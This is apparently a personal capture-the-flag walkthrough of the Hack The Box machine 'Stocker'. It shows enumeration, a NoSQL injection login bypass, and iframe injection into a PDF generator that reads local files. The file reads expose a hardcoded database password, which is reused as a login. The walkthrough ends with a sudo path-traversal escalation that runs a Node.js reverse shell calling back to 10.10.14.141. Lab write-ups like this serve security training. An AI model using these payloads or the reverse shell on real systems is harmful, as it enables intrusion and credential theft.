/etc/hosts
nmap
nmap -sV -vvv -p- stocker.htb -sC
stocker.htb website
Names
Angoose Garden
Subdomain
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.stocker.htb" -u http://stocker.htb -fs 178Output:
[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 76ms]
* FUZZ: devAdd it to /etc/hosts
feroxbuster
stocker.htb
feroxbuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://stocker.htbNothing interesting.
dev.stocker.htb
feroxbuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://dev.stocker.htb
dev.stocker.htb website
We can’t determine if the user is valid or not.
Wappalyser
Interesting things:
- Hugo 0.84
- Express
It’s always the same cookie:
s%3AEkbF_uqspuca0DfXERWTzsf0cWG94GB0.2PuvtFQYtitfWmH51fsrOd8Mx86P0IoPxyRVhB6A41oGoogle: connect.sid
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/nodejs-express
npm i @digital-interruption/cookie-monsterI’ve lost lost of times on this one, it’s not working.
I’ve tried admin, stocker, Garden, Angoose. Maybe that’s not what I should do.
./cookie-monster.js --cookie s%3AEkbF_uqspuca0DfXERWTzsf0cWG94GB0 --signature 2PuvtFQYtitfWmH51fsrOd8Mx86P0IoPxyRVhB6A41o -w /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txtLet’s go back to the website.
Bypass login page
https://book.hacktricks.xyz/pentesting-web/login-bypass
it’s accepting the json:
it’s not working.
https://book.hacktricks.xyz/pentesting-web/nosql-injection
POST /login HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 53
Origin: http://dev.stocker.htb
Connection: close
Referer: http://dev.stocker.htb/login
Cookie: connect.sid=s%3AEkbF_uqspuca0DfXERWTzsf0cWG94GB0.2PuvtFQYtitfWmH51fsrOd8Mx86P0IoPxyRVhB6A41o
Upgrade-Insecure-Requests: 1
{"username":{"$ne": null},"password":{"$ne": null}}
It’s working with a nosql injection.
Now If I add something to my basket I can generate a PDF.
I’m too tired to continue, I will do it tommorow.
manipulate the PDF
We can see the infos in json with burpsuit.
So, we can manipulate the PDF with 3 values:
- title
- price
- amount
The PDF is created by Skia/PDF m108
Found something but it’s not working well, maybe I use it wrong:
https://github.com/ziadanbari2021/exploit-CVE-2020-24815
Let’s see the code to do it ourself.
file it the file we want to read.
"title":"<iframe src=file:////{}>".format(file)Then he download the PDF:
And convert it into text:
So this is my request.
And this is my PDF:
Even with pdftotext it’s not perfect:
I need to know the exact file I should read, we don’t know any users, but maybe we can read config files with creds, or modify the pyaload to execute an RCE.
I found something to get a better view:
"title":"<iframe width='1000' height='1000' src=file://///etc/passwd>",
User
_laurel
angooseConfig file with creds
They use mongodb and express
I don’t really know what to search, I’m blind and slow. I have to fuzz it.
I will see it the file exist when the len of the pdf if bigger than Content-Length: 31133
Whit this:
curl -I http://dev.stocker.htb/api/po/64304da8da348e3d8cd8fe5b Now to generate the PDF I will use this:
curl -i -s -k -X $'POST' \
-H $'Host: dev.stocker.htb' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: http://dev.stocker.htb/stock' -H $'Content-Type: application/json' -H $'Content-Length: 242' -H $'Origin: http://dev.stocker.htb' -H $'Connection: close' \
-b $'connect.sid=s%3Ahpp9xtDJh-22qPPIQMzkqYz472TQw5vR.IgUuc96nI2Df8%2BBOvwXUpYzNAT1Nuyc1yU%2FhRsFH9jI' \
--data-binary $'{\"basket\":[{\"_id\":\"638f116eeb060210cbd83a93\",\"title\":\"<iframe width=\'1000\' height=\'1000\' src=file://///etc/nginx/nginx.conf>\",\"description\":\"It\'s toilet paper.\",\"image\":\"toilet-paper.jpg\",\"price\":0.69,\"currentStock\":4212,\"__v\":0,\"amount\":1}]}' \
$'http://dev.stocker.htb/api/order' | tail +10 | cut -d \" -f 6
Ok, Ive done the fuzzer, he’s slower than me, seriously…
I need to run every curl commands in backgroud to be faster.
I will just continue by hand:
it was a bad idea to read this file :/var/log/nginx/access.log
/etc/nginx/nginx.conf
I need to see more !
You just have to change the value of this:
"title":"<iframe width='1000' height='2000' src=file:////etc/nginx/nginx.conf >",But I have Internal Server Error each time so I need to decrease the size.
We lhave the web directory, we need a file:
https://blog.logrocket.com/creating-configuration-files-node-js-using-node-config/
Node-config supports many file extensions. At the time of publication, the current version of node-config (3.3.6) supports the following extensions:
- .json
- .json5
- .hjson
- .yaml or .yml
- .coffee
- .js
- .cson
- .properties
- .toml
- .ts
- .xml
/var/www/dev/index.js is present.
// TODO: Configure loading from dotenv for production
const dbURI = "mongodb://dev:IHeardPassphrasesArePrettySecure@localhost/dev?authSource=admin&w=1";We have one password: IHeardPassphrasesArePrettySecure
It’s the password of angoose.
We don’t have the rights on the files.
The * mean everything, it need to be a JS file.
So instead of puting a file I can put an another directory.
sudo node /usr/local/scripts/../../../../../tmp/rs.jsIn /tmp/rs.js
https://www.revshells.com/
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("sh", []);
var client = new net.Socket();
client.connect(4949, "10.10.14.141", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();